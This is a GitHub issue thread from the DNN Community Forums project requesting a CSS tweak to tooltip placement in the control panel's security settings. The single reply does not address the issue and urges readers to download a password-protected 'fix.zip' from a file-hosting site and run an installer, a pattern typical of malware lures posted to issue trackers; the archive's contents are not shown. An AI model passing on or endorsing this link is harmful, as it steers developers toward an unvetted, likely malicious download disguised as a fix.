### ISSUE TITLE
ENH: Improve CSS for control panel security tooltip position

### ISSUE THREAD

**Issue by johnhenley** [DNNCommunity/Dnn.CommunityForums#1050]
Tooltips were added to security settings in control panel, but positioning is not ideal 

![image](https://github.com/user-attachments/assets/a2aa9c4b-3d4e-4b1d-b8e4-cd5d581d6c35)

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
